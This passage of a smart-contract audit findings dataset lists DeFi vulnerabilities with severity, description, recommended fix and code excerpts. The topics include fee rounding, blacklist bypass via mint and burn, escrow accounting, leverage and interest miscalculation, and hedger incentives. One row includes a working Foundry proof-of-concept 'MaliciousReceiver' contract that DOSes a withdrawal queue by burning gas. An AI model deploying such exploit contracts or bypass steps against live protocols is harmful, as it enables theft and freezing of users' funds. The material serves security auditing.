debt.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n\\nUsers only need to pay for the gas cost for fulfilling the order when they claim the order to retrieve the swapped tokens. When the order is fulfilled, the swapped tokens will be sent to and stored in the `LimitOrderRegistry` contract.\\nHowever, in the event that the value of the swapped tokens crash (e.g., Terra's LUNA crash), it makes more economic sense for the users to abandon (similar to defaulting in traditional finance) the orders without claiming the worthless tokens to avoid paying the more expensive fee to the owner.\\nAs a result, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.","Consider collecting the fee in advance based on a rough estimation of the expected gas fee. When the users claim the order, any excess fee will be refunded, or any deficit will be collected from the users.\\nIn this case, if many users choose to abandon the orders, the owner will not incur any significant losses.","Owners might be unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.","```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n" +Owner unable to collect fulfillment fee from certain users due to revert error,medium,"Certain users might not be able to call the `claimOrder` function under certain conditions, resulting in the owner being unable to collect fulfillment fees from the users.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n\\nAssume the following:\\nSHIB has 18 decimals of precision, while USDC has 6.\\nAlice (Small Trader) deposited 10 SHIB while Bob (Big Whale) deposited 100000000 SHIB.\\nThe batch order was fulfilled, and it claimed 9 USDC (totalTokenOut)\\nThe following formula and code compute the number of swapped/claimed USDC tokens a user is entitled to.\\n```\\nowed = (totalTokenOut * depositAmount) / totalTokenDeposited\\nowed = (9 USDC * 10 SHIB) / 100000000 SHIB\\nowed = (9 * 10^6 * 10 * 10^18) / (100000000 * 10^18)\\nowed = (9 * 10^6 * 10) / (100000000)\\nowed = 90000000 / 100000000\\nowed = 0 USDC (Round down)\\n```\\n\\nBased on the above assumptions and computation, Alice will receive zero tokens in return due to a rounding error in Solidity.\\nThe issue will be aggravated under the following conditions:\\nIf the difference in the precision between `token0` and `token1` in the pool is larger\\nThe token is a stablecoin, which will attract a lot of liquidity within a small price range (e.g. $0.95 ~ $1.05)\\nThe rounding down to zero is unavoidable in this scenario due to how values are represented. It is not possible to send Alice 0.9 WEI of USDC. The smallest possible amount is 1 WEI.\\nIn this case, it will attempt to transfer a zero amount of `tokenOut,` which might result in a revert as some tokens disallow the transfer of zero value. As a result, when users call the `claimOrder` function, it will revert, and the owner will not be able to collect the fulfillment fee from the users.\\n```\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n","Consider only transferring the assets if the amount is more than zero.\\n```\\nuint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n// Transfer tokens owed to user.\\n// Remove the line below\\n tokenOut.safeTransfer(user, owed);\\n// Add the line below\\n if (owed > 0) tokenOut.safeTransfer(user, owed);\\n```\\n","When a user cannot call the `claimOrder` function due to the revert error, the owner will not be able to collect the fulfillment fee from the user, resulting in a loss of fee for the owner.","```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n" +Bypass the blacklist restriction because the blacklist check is not done when minting or burning,high,"Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nIn the whitepaper:\\nthe protocol emphasis that they implement a blacklist feature for enforcing OFAC, AML and other account security requirements A blacklisted will not able to send or receive tokens\\nthe protocol want to use the whitelist feature to be compliant to not let the blacklisted address send or receive dSahres\\nFor this reason, before token transfer, the protocol check if address from or address to is blacklisted and the blacklisted address can still create buy order or sell order\\n```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n\\nthis is calling\\n```\\nfunction requireNotRestricted(address from, address to) external view virtual {\\n // Check if either account is restricted\\n if (blacklist[from] || blacklist[to]) {\\n revert AccountRestricted();\\n }\\n // Otherwise, do nothing\\n}\\n```\\n\\nbut as we can see, when the dShare token is burned or minted, the blacklist does not apply to address(to)\\nthis allows the blacklisted receiver to bypass the blacklist restriction and still send and receive dShares and cash out their dShares\\nbecause the minting dShares is not blacklisted\\na blacklisted user create a buy order with payment token and set the order receiver to a non-blacklisted address\\nthen later when the buy order is filled, the new dShares is transferred and minted to an not-blacklisted address\\nbecause the burning dShares is not blacklisted\\nbefore the user is blacklisted, a user can frontrun the blacklist transaction to create a sell order and transfer the dShares into the OrderProcessor\\nthen later when the sell order is filled, the dShares in burnt from the SellOrderProcess escrow are burnt and the user can receive the payment token","Issue Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nimplement proper check when burning and minting of the dShares to not let user game the blacklist system, checking if the receiver of the dShares is blacklisted when minting, before filling sell order and burn the dShares, check if the requestor of the sell order is blacklisted\\ndo not let blacklisted address create buy order and sell order",Bypass the blacklist restriction because the blacklist check is not done when minting or burning,"```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n" +Escrow record not cleared on cancellation and order fill,medium,"In `DirectBuyIssuer.sol`, a market buy requires the operator to take the payment token as escrow prior to filling the order. Checks are in place so that the math works out in terms of how much escrow has been taken vs the order's remaining fill amount. However, if the user cancels the order or fill the order, the escrow record is not cleared.\\nThe escrow record will exists as a positive amount which can lead to accounting issues.\\nTake the following example:\\nOperator broadcasts a `takeEscrow()` transaction around the same time that the user calls `requestCancel()` for the order\\nOperator also broadcasts a `cancelOrder()` transaction\\nIf the `cancelOrder()` transaction is mined before the `takeEscrow()` transaction, then the contract will transfer out token when it should not be able to.\\n`takeEscrow()` simply checks that the `getOrderEscrow[orderId]` is less than or equal to the requested amount:\\n```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n\\nCancelling the order does not clear the `getOrderEscrow` record:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata order, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // Prohibit cancel if escrowed payment has been taken and not returned or filled\\n uint256 escrow = getOrderEscrow[orderId];\\n if (orderState.remainingOrder != escrow) revert UnreturnedEscrow();\\n\\n\\n // Standard buy order accounting\\n super._cancelOrderAccounting(order, orderId, orderState);\\n }\\n}\\n```\\n\\nThis can lead to an good-faith and trusted operator accidentally taking funds from the contract that should not be able to leave.\\ncoming up with the fact that the transaction does not have deadline or expiration date:\\nconsider the case below:\\na good-faith operator send a transaction, takeEscrow\\nthe transaction is pending in the mempool for a long long long time\\nthen user fire a cancel order request\\nthe operator help user cancel the order\\nthe operator send a transcation cancel order\\ncancel order transaction land first\\nthe takeEscrow transaction lands\\nbecause escrow state is not clear up, the fund (other user's fund) is taken\\nIt's also worth noting that the operator would not be able to call `returnEscrow()` because the order state has already been cleared by the cancellation. `getRemainingOrder()` would return 0.\\n```\\n function returnEscrow(OrderRequest calldata orderRequest, bytes32 salt, uint256 amount)\\n external\\n onlyRole(OPERATOR_ROLE)\\n {\\n // No nonsense\\n if (amount == 0) revert ZeroValue();\\n // Can only return unused amount\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 remainingOrder = getRemainingOrder(orderId);\\n uint256 escrow = getOrderEscrow[orderId];\\n // Unused amount = remaining order - remaining escrow\\n if (escrow + amount > remainingOrder) revert AmountTooLarge();\\n```\\n",Clear the escrow record upon canceling the order.,Issue Escrow record not cleared on cancellation and order fill\\nInsolvency due to pulling escrow that should not be allowed to be taken,"```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n" +"Cancellation refunds should return tokens to order creator, not recipient",medium,"When an order is cancelled, the refund is sent to `order.recipient` instead of the order creator because it is the order creator (requestor) pay the payment token for buy order or pay the dShares for sell order\\nAs is the standard in many L1/L2 bridges, cancelled deposits should be returned to the order creator instead of the recipient. In Dinari's current implementation, a refund acts as a transfer with a middle-man.\\nSimply, the `_cancelOrderAccounting()` function returns the refund to the order.recipient:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n\\nRefunds should be returned to the order creator in cases where the input recipient was an incorrect address or simply the user changed their mind prior to the order being filled.","Return the funds to the order creator, not the recipient.",Potential for irreversible loss of funds\\nInability to truly cancel order,"```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n" +`reduce_position` doesn't update margin mapping correctly,high,"`reduce_position` function decrease the margin amount of the position but doesn't add it back to the user's margin mapping, making it impossible to withdraw the margin.\\nAfter selling some position tokens back against debt tokens using `reduce_position` function, `debt_shares` and `margin_amount` are reduced proportionally to keep leverage the same as before:\\nVault.vy#L313-L330\\n```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n\\nHowever, even though some of the margin have been paid back (position.margin_amount has been reduced), `self.margin[position.account][position.debt_token]` mapping hasn't been updated by adding `reduce_margin_by_amount` which would allow the user to withdraw his margin.","Consider modifying the code like this:\\n```\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n+ self.margin[position.account][position.debt_token] += reduce_margin_by_amount\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n",Users will lose their margin tokens.,"```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n" +Leverage calculation is wrong,high,"Leverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.\\n`_calculate_leverage` miscalculate the leverage by using `_debt_value + _margin_value` as numerator instead of `_position_value` :\\nVault.vy#L465-L477\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nThe three inputs of the function `_position_value`, `_debt_value` and `_margin_value` are all determined by a chainlink oracle price feed. `_debt_value` represents the value of the position's debt share converted to debt amount in USD. `_margin_value` represents the current value of the position's initial margin amount in USD. `_position_value` represents the current value of the position's initial position amount in USD.\\nThe problem with the above calculation is that `_debt_value + _margin_value` does not represent the value of the position. The leverage is the ratio between the current value of the position and the current margin value. `_position_value - _debt_value` is correct and is the current margin value, but `_debt_value + _margin_value` doesn't represent the current value of the position since there is no guarantee that the debt token and the position token have correlated price movements.\\nExample: debt token: ETH, position token: BTC.\\nAlice uses 1 ETH of margin to borrow 14 ETH (2k USD/ETH) and get 1 BTC (30k USD/BTC) of position token. Leverage is 14.\\nThe next day, the price of ETH in USD is still 2k USD/ETH but BTC price in USD went down from 30k to 29k USD/BTC. Leverage is now (_position_value == 29k) / (_position_value == 29k - _debt_value == 28k) = 29, instead of what is calculated in the contract: (_debt_value == 28k + _margin_value == 2k) / (_position_value == 29k - _debt_value == 28k) = 30.","Consider modifying the code like this:\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n- * (_debt_value + _margin_value)\\n+ * (_position_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nEscalate for 10 USDC. My report shows why the current used formula is wrong as it does not take into account that debt tokens and position tokens are not necessarily tokens with correlated prices. The duplicate #100 shows in another way that the formula fail to calculate the leverage of a position correctly. The impact is the same, but my report highlight `_debt_value + _margin_value != _position_value`, the same way that the debt against a house is not equal to the market value of this house (also described in another way in #156). The definition of leverage used in the code is not correct and will lead to unfair liquidations or over leveraged positions, which is definitely high severity.\\nUnexpected and unfair liquidation could cause loss to users. Since the issue roots from the formula, the loss could be long term, result in accumulated fund loss for users, can can be deemed as ""material loss of funds"".\\nBased on the above, high severity might be appropriate.\\nUnstoppable-DeFi\\nhrishibhat\\n@Unstoppable-DeFi based on the above escalation it seems to be a high issue. Is there any other reason this should not be a high-severity issue?\\nhrishibhat\\nResult: High Has duplicates Considering this issue a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\ntwicek: accepted",Leverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.,"```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n" +Interested calculated is ampliefied by multiple of 1000 in `_debt_interest_since_last_update`,high,"Interest calculated in the `_debt_interest_since_last_update` function is amplified by multiple of 1000, hence can completely brick the system and debt calculation. Because we divide by PERCENTAGE_BASE instead of PERCENTAGE_BASE_HIGH which has more precision and which is used in utilization calculation.\\nFollowing function calculated the interest accured over a certain interval :\\n```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n\\nBut the results from the above function are amplified by factor of 1000 due to the reason that the intrest per second as per test file is calculated as following:\\n```\\n # accordingly the current interest per year should be 3% so 3_00_000\\n # per second that is (300000*10^18)/(365*24*60*60)\\n expected_interest_per_second = 9512937595129375\\n\\n assert (\\n expected_interest_per_second\\n == vault_configured.internal._current_interest_per_second(usdc.address)\\n )\\n```\\n\\nSo yearly interest has the precision of 5 as it is calculated using utilization rate and `PERCENTAGE_BASE_HIGH_PRECISION` is used which has precision of 5 .and per second has the precision of 18, so final value has the precision of 23.\\nInterest per second has precision = 23.\\nBut if we look at the code:\\n```\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n```\\n\\nWe divide by PERCENTAGE_BASE that is = 100_00 = precision of => 2 And than by PRECISION = 1e18 => precision of 18. So accumulated precision of 20, where as we should have divided by value precises to 23 to match the nominator.\\nWhere is we should have divided by PERCENTAGE_BASE_HIGH instead of PERCENTAGE_BASE\\nHence the results are amplified by enormous multiple of thousand.","Use PERCENTAGE_BASE_HIGH in division instead of PERCENTAGE_BASE.\\nEscalate for 10 USDC\\nThis should be high as described impact in the given submission and the duplicate too.\\nA magnitude of 1000 times of interest can be deemed as ""material loss of funds"".\\n141345\\nEscalate for 10 USDC The wrong calculation of interest rates will cause a direct loss of funds to users. This should definitely be high severity.\\nSame as above\\nhrishibhat\\nResult: High Has duplicates Considering this a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\nNabeel-javaid: accepted\\ntwicek: accepted","Interest are too much amplified, that impacts the total debt calculation and brick whole leverage, liquidation and share mechanism.\\nNote: Dev confirmed that the values being used in the tests are the values that will be used in production.",```\\ndef _debt_interest_since_last_update(_debt_token: address) -> uint256:\\n\\n return (\\n\\n (block.timestamp - self.last_debt_update[_debt_token])* self._current_interest_per_second(_debt_token)\\n * self.total_debt_amount[_debt_token]\\n / PERCENTAGE_BASE \\n / PRECISION\\n )\\n```\\n +Hedgers are not incentivized to respond to user's closing requests,medium,"Hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.\\nHow `fillCloseRequest` function works?\\nFor a Long position, when PartyB (Hedger) calls the `fillCloseRequest` function to fill a close position under normal circumstances, the hedger cannot charge a spread because the hedger has to close at the user's requested close price (quote.requestedClosePrice),\\nIf the hedger decides to close at a higher price, it is permissible by the function, but the hedger will lose more, and the users will gain more because the users' profit is computed based on `long profit = closing price - opening price`.\\nUnder normal circumstances, most users will set the requested close price (quote.requestedClosePrice) close to the market price most of the time.\\nIn short, the `fillCloseRequest` function requires the hedger to match or exceed the user' requested price. The hedger cannot close at a price below the user's requested price in order to charge a spread.\\n```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n ""PartyBFacet: Closed price isn't valid""\\n )\\n```\\n\\nHow `forceClosePosition` function works?\\nFor a Long position, the `forceCloseGapRatio` will allow the hedger to charge a spread from the user's requested price (quote.requestedClosePrice) when the user (PartyA) attempts to force close the position.\\nThe `upnlSig.price` is the market price and `quote.requestedClosePrice` is the price users ask to close at. By having the `forceCloseGapRatio`, assuming that `forceCloseGapRatio` is 5%, this will create a spread between the two prices (upnlSig.price and quote.requestedClosePrice) that represent a cost that the users (PartyA) need to ""pay"" in order to force close a position.\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n quote.requestedClosePrice +\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n ..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n```\\n\\nIssue with current design\\nAssume a hedger ignores the user's close request. In this case, the users (PartyA) have to call the `forceClosePosition` function by themselves to close the position and pay a spread.\\nThe hedgers can abuse this mechanic to their benefit. Assuming the users (PartyA) ask to close a LONG position at a fair value, and the hedgers respond by calling the `fillCloseRequest` to close it. In this case, the hedgers won't be able to charge a spread because the hedgers are forced to close at a price equal to or higher than the user's asking closing price (quote.requestedClosePrice).\\nHowever, if the hedger chooses to ignore the user's close request, this will force the user to call the `forceClosePosition,` and the user will have to pay a spread to the hedgers due to the gap ratio. In this case, the hedgers will benefit more due to the spread.\\nIn the long run, the hedgers will be incentivized to ignore users' close requests.","Hedgers should not be entitled to charge a spread within the `forceClosePosition` function because some hedgers might intentionally choose not to respond to user requests in order to force the users to close the position themselves. In addition, hedgers are incentivized to force users to close the position themselves as the `forceClosePosition` function allows them the charge a spread.\\nWithin the `forceClosePosition` function, consider removing the gap ratio to remove the spread and fill the position at the market price (upnlSig.price).\\n```\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n upnlSig.price >=\\n// Add the line below\\n quote.requestedClosePrice, \\n// Remove the line below\\n quote.requestedClosePrice // Add the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n } else {\\n require(\\n upnlSig.price <=\\n// Add the line below\\n quote.requestedClosePrice,\\n// Remove the line below\\n quote.requestedClosePrice // Remove the line below\\n\\n// Remove the line below\\n (quote.requestedClosePrice * maLayout.forceCloseGapRatio) /\\n// Remove the line below\\n 1e18,\\n ""PartyAFacet: Requested close price not reached""\\n );\\n }\\n..SNIP..\\n// Remove the line below\\n LibQuote.closeQuote(quote, filledAmount, quote.requestedClosePrice);\\n// Add the line below\\n LibQuote.closeQuote(quote, filledAmount, upnlSig.price);\\n }\\n```\\n\\nFor long-term improvement to the protocol, assuming that the user's requested price is of fair value:\\nHedger should be penalized for not responding to the user's closing request in a timely manner; OR\\nHegder should be incentivized to respond to the user's closing request. For instance, they are entitled to charge a spread if they respond to user closing requests.","The hedgers will be incentivized to ignore users' close requests, resulting in the users having to wait for the cooldown before being able to force close a position themselves. The time spent waiting could potentially lead to a loss of opportunity cost for the users.\\nIn addition, hedgers could intentionally force the users to close the positions themselves via the `forceClosePosition` and charge a spread to earn more, which results in the users closing at a worse price, leading to a loss of profit for them.","```\\nfunction fillCloseRequest(\\n..SNIP..\\n if (quote.positionType == PositionType.LONG) {\\n require(\\n closedPrice >= quote.requestedClosePrice,\\n ""PartyBFacet: Closed price isn't valid""\\n )\\n```\\n" +ProcessWithdrawals is still DOS-able,high,"DOS on process withdrawals were reported in the previous code4rena audit however the fix does not actually stop DOS, it only makes it more expensive. There is a much cheaper way to DOS the withdrawal queue - that is by specifying the `usr` to be a smart contract that consumes all the gas.\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport ""./Utils.sol"";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils {\\n event WithdrawalFailed(address indexed trader, uint amount, bytes data);\\n\\n function setUp() public {\\n setupContracts();\\n }\\n\\n function test_CannotProcessWithdrawals(uint128 amount) public {\\n MaliciousReceiver r = new MaliciousReceiver();\\n\\n vm.assume(amount >= 5e6);\\n // mint vusd for this contract\\n mintVusd(address(this), amount);\\n // alice and bob also mint vusd\\n mintVusd(alice, amount);\\n mintVusd(bob, amount);\\n\\n // withdraw husd\\n husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. \\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n\\nCopy and paste this file into the test/foundry folder and run it.\\nThe test will not fail because foundry has a very high gas limit but you can see from the test that the amount of gas that was recorded in the malicious contract is higher than 30m (which is the current gas limit on ethereum). If you ran the test by specifying the —gas-limit i.e. `forge test -vvv --match-path test/foundry/VUSDRevert.t.sol --gas-limit 30000000` The test will fail with `Reason: EvmError: OutOfGas` because there is not enough gas to transfer to the malicious contract to run 150k iterations.",From best recommendation to worst\\nRemove the queue and `withdraw` the assets immediately when `withdraw` is called.\\nAllow users to process withdrawals by specifying the index index\\nAllow the admin to remove these bad withdrawals from the queue\\nAllow the admin to adjust the start position to skip these bad withdrawals.,Users will lose their funds and have their VUSD burnt forever because nobody is able to process any withdrawals.,"```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.9;\\nimport ""./Utils.sol"";\\n\\ncontract MaliciousReceiver {\\n uint256 public gas;\\n receive() payable external {\\n gas = gasleft();\\n for(uint256 i = 0; i < 150000; i++) {} // 140k iteration uses about 28m gas. 150k uses slightly over 30m.\\n }\\n}\\n\\ncontract VUSDWithReceiveTest is Utils 